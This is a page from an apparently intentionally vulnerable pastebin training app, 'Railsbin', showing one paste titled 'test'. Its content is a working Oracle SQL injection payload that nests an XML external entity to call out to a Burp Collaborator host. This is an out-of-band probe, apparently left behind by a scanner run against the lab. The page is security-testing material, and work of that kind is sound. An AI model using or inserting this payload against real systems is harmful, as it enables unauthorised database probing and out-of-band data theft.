Railsbin – The vulnerable pastebin service!

User:

Title: test

Content:

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vczad SYSTEM "http://bcrxlxle20eayta7fdob363ah1n1b4zwmqaf.burpcollab'||'orator.net/">%vczad;]>'),'/l') from dual)

Edit | Back